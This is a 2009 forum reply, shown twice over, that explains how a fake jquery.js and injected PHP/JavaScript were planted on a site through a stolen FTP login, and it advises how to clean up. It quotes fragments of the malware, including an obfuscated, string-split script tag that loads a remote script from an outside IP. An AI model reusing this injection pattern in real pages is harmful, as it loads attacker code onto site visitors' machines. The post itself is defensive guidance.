seeing this fake jquery.js file...anyone else?

cd34 · 2009-04-28, 09:26 AM

That is an exploit added to html and javascript by FTP. If you are seeing that, then the submitter's FTP account has been accessed.

There are about 4 different incarnations of it -- all resulting in the same end result. You'll also want to check any php file for code like this embedded right before the <body tag

Code:

<?php if(!function_exists('tmp_lkojfghx')){

Code:

<script language=javascript><!-- 
document.write(unescape('uyN%3CsDLc0

And the jquery.js from that site contains

Code:

<s'+'cri'+'pt src="htt'+'p://94.2'+'47.2.1'+'95/ne'+'ws/?id=10KK"><'+'/scri'+'pt>

In addition to a bit of other stuff.

news checks to see if there is a cookie, if not, it runs a toolbar installer.

Tell the submitter to change their FTP password, run a scan on their machine for spyware/trojans/viruses, then change their FTP password again if they have found anything.

2009-04-28, 09:26 AM	#3
cd34 a.k.a. Sparky Join Date: Sep 2004 Location: West Palm Beach, FL, USA Posts: 2,396	That is an exploit added to html and javascript by FTP. If you are seeing that, then the submitter's FTP account has been accessed. There are about 4 different incarnations of it -- all resulting in the same end result. You'll also want to check any php file for code like this embedded right before the <body tag Code: <?php if(!function_exists('tmp_lkojfghx')){ Code: <script language=javascript><!-- document.write(unescape('uyN%3CsDLc0 And the jquery.js from that site contains Code: <s'+'cri'+'pt src="htt'+'p://94.2'+'47.2.1'+'95/ne'+'ws/?id=10KK"><'+'/scri'+'pt> In addition to a bit of other stuff. news checks to see if there is a cookie, if not, it runs a toolbar installer. Tell the submitter to change their FTP password, run a scan on their machine for spyware/trojans/viruses, then change their FTP password again if they have found anything. __________________ SnapReplay.com a different way to share photos - iPhone & Android